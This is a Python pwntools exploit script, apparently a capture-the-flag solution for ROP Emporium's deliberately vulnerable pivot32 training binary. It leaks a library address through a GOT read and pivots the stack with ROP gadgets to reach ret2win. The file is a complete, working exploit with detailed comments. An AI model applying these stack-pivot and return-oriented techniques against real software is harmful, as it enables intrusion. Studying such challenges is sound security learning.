Created
December 7, 2017 14:31
pivot32
#!/usr/bin/env python | |
from pwn import * | |
# 32-bit Linux target: makes p32/u32 and any asm()/ROP helpers default to i386.
context.update(os="linux", arch="i386")
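def main(binary="./pivot32", lib=None):
    """Exploit ROP Emporium's pivot32: pivot the stack, leak libpivot, return into ret2win.

    The attack runs in three stages against a local copy of ``binary``:

    1. The program hands out an address to pivot to and reads a first (large)
       chain into it: ``foothold_function@plt`` -> ``printf@plt`` (returning
       into ``main``) with ``foothold_function@got`` as printf's argument.
       Calling foothold once makes the loader fill its GOT slot; printf then
       emits the raw 4-byte pointer stored there.
    2. The second (short, stack-smashing) chain is ``pop eax; xchg esp, eax``
       with the pivot address, which moves ESP onto the first chain.
    3. After the leak the program is back in ``main`` for another round; a
       third chain overwrites the saved EIP with ``ret2win`` in the library.

    Args:
        binary: path to the target executable.  Only a local ``process`` is
            supported; there is no remote mode.
        lib: optional path to the pivot shared library.  When given, the
            ``foothold_function``/``ret2win`` offsets are read from its symbol
            table instead of the hard-coded values, which are only valid for
            the exact build this script was written against.

    Side effects: spawns the target, prints everything it sends after the
    final chain, and closes the process before returning even if an I/O
    step fails.
    """
    # Gadgets from the main binary (absolute addresses, so the binary must be
    # non-PIE).  NOTE(review): build-specific, like the offsets below.
    pop_eax = 0x80488c0        # pop eax ; ret
    xchg_esp_eax = 0x80488c2   # xchg esp, eax ; ret

    # Offsets inside the shared library, relative to its load base.
    if lib is not None:
        lib_elf = ELF(lib)
        foothold_off = lib_elf.symbols["foothold_function"]
        ret2win_off = lib_elf.symbols["ret2win"]
    else:
        foothold_off = 0x770   # foothold_function
        ret2win_off = 0x967    # ret2win

    elf = ELF(binary)
    conn = process(binary)
    try:
        # The binary prints the address it will let us pivot to right after
        # ": ".  recvn() is used instead of recv(): recv(n) returns *up to* n
        # bytes, so a slow target could hand back a truncated address.
        conn.recvuntil(b": ")
        pivot_addr = int(conn.recvn(10), 16)   # "0x" + 8 hex digits

        # Stage 1 chain, written to pivot_addr.
        first_chain = b"".join([
            p32(elf.plt["foothold_function"]),  # resolve the GOT entry
            p32(elf.plt["printf"]),             # print it as a C string
            p32(elf.symbols["main"]),           # printf's return: back to main
            p32(elf.got["foothold_function"]),  # printf's first argument
        ])
        conn.sendline(first_chain)

        # Stage 2: 44 bytes reach the saved EIP; then pivot ESP to the chain.
        pivot_chain = b"A" * 44 + p32(pop_eax) + p32(pivot_addr) + p32(xchg_esp_eax)
        conn.sendline(pivot_chain)

        # printf stops at the first NUL byte, so this assumes the leaked
        # pointer contains none; otherwise recvn(4) would swallow later output.
        conn.recvuntil(b"libpivot.so")
        foothold_addr = u32(conn.recvn(4))
        libpivot_base = foothold_addr - foothold_off   # the library's base, not libc

        # Back in main: the pivot prompt and first read repeat.  The first
        # input is irrelevant this time, so send an empty line.
        conn.sendline(b"")

        # Stage 3: overwrite the saved EIP with ret2win; the trailing dword
        # sits where ret2win's own return address would be.
        final_chain = b"A" * 44 + p32(libpivot_base + ret2win_off) + b"A" * 4
        conn.sendline(final_chain)

        print(conn.recvall().decode("utf-8", "replace"))
    finally:
        conn.close()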
# Script entry point; main() returns None, so the process exits with status 0.
if __name__ == "__main__":
    raise SystemExit(main())